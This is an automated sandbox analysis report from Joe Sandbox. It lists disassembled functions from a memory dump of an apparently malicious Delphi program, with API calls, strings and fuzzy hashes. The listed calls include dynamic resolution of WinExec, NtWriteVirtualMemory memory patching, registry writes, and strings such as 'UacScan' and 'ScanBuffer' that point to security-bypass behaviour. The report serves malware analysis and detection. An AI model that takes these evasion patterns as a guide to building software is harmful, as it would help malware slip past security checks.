Instruction Fuzzy Hash: 2811D3B2680248AFEB40EFA9EC51F9A77EDEB0CB00F914420BA08D3300C634ED519B24

Function 02DA85BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON

Download Yara Rule

APIs

Part of subcall function 02DA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DA823C,?,?,00000000,?,02DA7A7E,ntdll,00000000,00000000,02DA7AC3,?,?,00000000), ref: 02DA820A
Part of subcall function 02DA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DA821E

Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9

WinExec.KERNEL32(?,?), ref: 02DA8624

Strings

Kernel32, xrefs: 02DA8607
WinExec, xrefs: 02DA85D5

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: 462da612556021a648a9e664b87565c3aecc8e413b208139c27864a234f94a85
Instruction ID: 5a5e9ccb511019f4a29cf65a6af8165746fa16e66c2af735193a87d0736a9e04
Opcode Fuzzy Hash: 462da612556021a648a9e664b87565c3aecc8e413b208139c27864a234f94a85
Instruction Fuzzy Hash: 6C016974A84244BFEB00EFA9EC22F5AB7E9E709B00F908420B900D2740D770AD11AA24

Function 02DA85BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON

Download Yara Rule

APIs

Part of subcall function 02DA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DA823C,?,?,00000000,?,02DA7A7E,ntdll,00000000,00000000,02DA7AC3,?,?,00000000), ref: 02DA820A
Part of subcall function 02DA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DA821E

Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9

WinExec.KERNEL32(?,?), ref: 02DA8624

Strings

Kernel32, xrefs: 02DA8607
WinExec, xrefs: 02DA85D5

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: 747be19e6a19279d4efdf5e6e703b8df695d43c680a33ac4fc16dfb220c07c5a
Instruction ID: c963c823dc145197ca7cbaf9661f38fd0b16af3fc378971b41560b694423f9ac
Opcode Fuzzy Hash: 747be19e6a19279d4efdf5e6e703b8df695d43c680a33ac4fc16dfb220c07c5a
Instruction Fuzzy Hash: 76F08C74A84244BFEB00EFA9EC22F5EB7EDE709B00F908420F900D2740D770AD11AA24

Function 02DA5C2C Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02DA5D74,?,?,02DA3900,00000001), ref: 02DA5C88
GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02DA5D74,?,?,02DA3900,00000001), ref: 02DA5CB6

Part of subcall function 02D97D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02DA3900,02DA5CF6,00000000,02DA5D74,?,?,02DA3900), ref: 02D97DAA

Part of subcall function 02D97F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02DA3900,02DA5D11,00000000,02DA5D74,?,?,02DA3900,00000001), ref: 02D97FB7

GetLastError.KERNEL32(00000000,02DA5D74,?,?,02DA3900,00000001), ref: 02DA5D1B

Part of subcall function 02D9A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02D9C3D9,00000000,02D9C433), ref: 02D9A797

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath
String ID:
API String ID: 503785936-0
Opcode ID: 271736575129beaeda2892a045024f59599b7988def78fea40e0656419a6536d
Instruction ID: 5b04102625078c000467bcdcd8b9839f3d7c043835c8ccb4f2a148393b3d99b4
Opcode Fuzzy Hash: 271736575129beaeda2892a045024f59599b7988def78fea40e0656419a6536d
Instruction Fuzzy Hash: 47314A70E006099FDF00EFA8D891B9EBBF6EB09704F908465E904AB391D7759E058FB1

Function 02DAF212 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02F0BA58), ref: 02DAF258
RegSetValueExA.ADVAPI32(00000894,00000000,00000000,00000001,00000000,0000001C,00000000,02DAF2C3), ref: 02DAF290
RegCloseKey.ADVAPI32(00000894,00000894,00000000,00000000,00000001,00000000,0000001C,00000000,02DAF2C3), ref: 02DAF29B

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 3585f46861aaf91181038ab669a4d70d26ff76618e7e31ef7ce79ba53c136fb1
Instruction ID: f297c55cbd412fcfefad1cfe25c049945f58acfdd4e5092ba88f1ef542fcb0c8
Opcode Fuzzy Hash: 3585f46861aaf91181038ab669a4d70d26ff76618e7e31ef7ce79ba53c136fb1
Instruction Fuzzy Hash: 0A115571A44208BFEF40EFA9E891E9AB7EDEB09304F404465B904D7751EA34EE018FA0

Function 02DAF214 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02F0BA58), ref: 02DAF258
RegSetValueExA.ADVAPI32(00000894,00000000,00000000,00000001,00000000,0000001C,00000000,02DAF2C3), ref: 02DAF290
RegCloseKey.ADVAPI32(00000894,00000894,00000000,00000000,00000001,00000000,0000001C,00000000,02DAF2C3), ref: 02DAF29B

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 6ebb4451556a89600847a32732837ae06d51727e6b2582c5f2fbe83a0241a23c
Instruction ID: 1df0ca503931b232fa3c353e4d1830aa138a2346821d03201abc73938a916766
Opcode Fuzzy Hash: 6ebb4451556a89600847a32732837ae06d51727e6b2582c5f2fbe83a0241a23c
Instruction Fuzzy Hash: 43115571A44208BFEF40EFA9E891E9AB7ADEB09304F404465B904D7751DA34EE018FA0

Function 02D9E364 Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 02D9E373

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 7b29260433b4f655143793486a1c40719fdb77fca52ac62bdbf8ee4c46cb4f86
Instruction ID: 80a0290ae4305453a733075870e0fa0b531987a93a1523beadfb9c13cd2c0add
Opcode Fuzzy Hash: 7b29260433b4f655143793486a1c40719fdb77fca52ac62bdbf8ee4c46cb4f86
Instruction Fuzzy Hash: F6F0A970718110C78F24FB39D884A69279AAF44342B505937B8CA9B302CB6ACC85CBB2

Function 02D94D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(02DAF4A4), ref: 02D94C6E
SysAllocStringLen.OLEAUT32(?,?), ref: 02D94D5B
SysFreeString.OLEAUT32(00000000), ref: 02D94D6D

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
Instruction ID: 84d3c512985cd878dcf4e3f7b1de7389157bd95b990f44d3ac404db9d9a20a49
Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
Instruction Fuzzy Hash: 5CE0ECB82052066EEF146F219941A3A222AEFC2794F14C499B840CA358D738DC41ED78

Function 02DA70DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 02DA73DA

Strings

H, xrefs: 02DA7191

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: 9e33f421ac6e00ac85074b921f7a865f1e9a970ccf573cf6e782b28cb47accb9
Instruction ID: 7c41aae59ca09586b6b2f0f14ea67eca08405eebce54e393556de789d7a3e670
Opcode Fuzzy Hash: 9e33f421ac6e00ac85074b921f7a865f1e9a970ccf573cf6e782b28cb47accb9
Instruction Fuzzy Hash: BBB1D074A016089FEB15CFA9D490A9DFBF2FF89314F258569E855AB320D730AC45CF50

Function 02D9E760 Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 02D9E781

Part of subcall function 02D9E364: VariantClear.OLEAUT32(?), ref: 02D9E373

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: 52ac32875b134fad6460299de5b919f578df8f9b7bb2a1b7e1743ba9b5388b36
Instruction ID: 0a36e7967bffa868831ee356b2151924933fd3327cc0254f780c89d7bd8f1b21
Opcode Fuzzy Hash: 52ac32875b134fad6460299de5b919f578df8f9b7bb2a1b7e1743ba9b5388b36
Instruction Fuzzy Hash: 4911827071021087CF34EF69C8C4AAA77DAEF84751B109467F58A8B315DB31CC41CAB2

Function 02D9E3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 02D9E43C

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 8dbe6a8cbfbf67a3f8c84539702386773ac58ea1fce573b93ae661a6b28e09ba
Instruction ID: 9618dad957012bc4348724d3a221ba0a63a77bcf8566fea44142e6adfcfa728e
Opcode Fuzzy Hash: 8dbe6a8cbfbf67a3f8c84539702386773ac58ea1fce573b93ae661a6b28e09ba
Instruction Fuzzy Hash: 00313E71A00218EBDF10EFA8D884AAA77E9EB0E714F444966F949D3340D735DE50CBA1

Function 02DA89D0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 02DA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DA823C,?,?,00000000,?,02DA7A7E,ntdll,00000000,00000000,02DA7AC3,?,?,00000000), ref: 02DA820A
Part of subcall function 02DA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DA821E

Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9

Part of subcall function 02DA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DA7DEC

Part of subcall function 02DA8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02DA83C2), ref: 02DA83A4

FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02E1738C,Function_0000662C,00000004,02E1739C,02E1738C,05F5E103,00000040,02E173A0,74AD0000,00000000,00000000), ref: 02DA8AAA

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
String ID:
API String ID: 1478290883-0
Opcode ID: 9ce9553e0915814cf372ac784aa04d8dfa95c1a15802b8ce203dfc3be2e0d387
Instruction ID: 5e5b228581d5f2c39e35b3f7533a6ef357488a604eb42288a626e47a2426a767
Opcode Fuzzy Hash: 9ce9553e0915814cf372ac784aa04d8dfa95c1a15802b8ce203dfc3be2e0d387
Instruction Fuzzy Hash: 94210EB0AC0300BEEB40EBA5DC12F5EB7AAEB04B00F505564B905E7381DB74AD819A69

Function 02DA6D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,02DA6DB9,?,?,?,00000000), ref: 02DA6D99

Part of subcall function 02D94C60: SysFreeString.OLEAUT32(02DAF4A4), ref: 02D94C6E

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: bc63c45d645a732555e07a7cca6385c29d354d26457eab9f8a5a90b78c8a4686
Instruction ID: 977772a37feaf15d12aec5bc0ad0f09f252a6f031e0d130a3753e543efc43702
Opcode Fuzzy Hash: bc63c45d645a732555e07a7cca6385c29d354d26457eab9f8a5a90b78c8a4686
Instruction Fuzzy Hash: DCE0ED39200208BFEF11EB6AEC61D8E77ADDF8A750F5104B1F80093700EA75AE0488B0

Function 02D95868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(02D90000,?,00000105), ref: 02D95886

Part of subcall function 02D95ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02D90000,02DBE790), ref: 02D95AE8
Part of subcall function 02D95ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D90000,02DBE790), ref: 02D95B06
Part of subcall function 02D95ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D90000,02DBE790), ref: 02D95B24
Part of subcall function 02D95ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02D95B42
Part of subcall function 02D95ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02D95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02D95B8B
Part of subcall function 02D95ACC: RegQueryValueExA.ADVAPI32(?,02D95D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02D95BD1,?,80000001), ref: 02D95BA9
Part of subcall function 02D95ACC: RegCloseKey.ADVAPI32(?,02D95BD8,00000000,?,?,00000000,02D95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02D95BCB

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
Instruction ID: 5316040523827f4333ff9d651221114a275c2f7223c7d69a60e909ff41ca2d83
Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
Instruction Fuzzy Hash: 05E032B1A002149BCF10DEA8D8C0A863398AB08750F440AA1FC68DF34AD7B1DE208BE0

Function 02D97DE0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02D97DF4

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
Instruction ID: fa78925e5ae656f97fa640b85168e368859df364d093b4a4596ec2c3d5f682a4
Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
Instruction Fuzzy Hash: F4D012B22091506AE724965A6D44EA75ADCCBC6770F100629B558C6280D6208C01C6B1

Function 02D97E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02DB356F,ScanString,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,ScanBuffer,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,Initialize), ref: 02D97E8B

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
Instruction ID: 0d7d9722e45730bc83b377eea97f2410451df4ef6021edb663125e8e1b0066d9
Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
Instruction Fuzzy Hash: 35C08CF26222020E2F60A6BC5CC4219428D9984138B601E61F438CA3C2D316DC232830

Function 02D97E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02DB041F,ScanString,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,ScanString,02E17380,02DBB7B8,UacScan,02E17380,02DBB7B8,UacInitialize), ref: 02D97E67

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
Instruction ID: a3369b9b618c82ac8c000a7aae9682aad9c8a736ad85228b8ea539de78e50442
Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
Instruction Fuzzy Hash: 4AC08CF02222011A6F5066BC2CC4249528E8904238B640A61B43CC73E2D322DCA36820

Function 02D94C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 02D94C8B

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
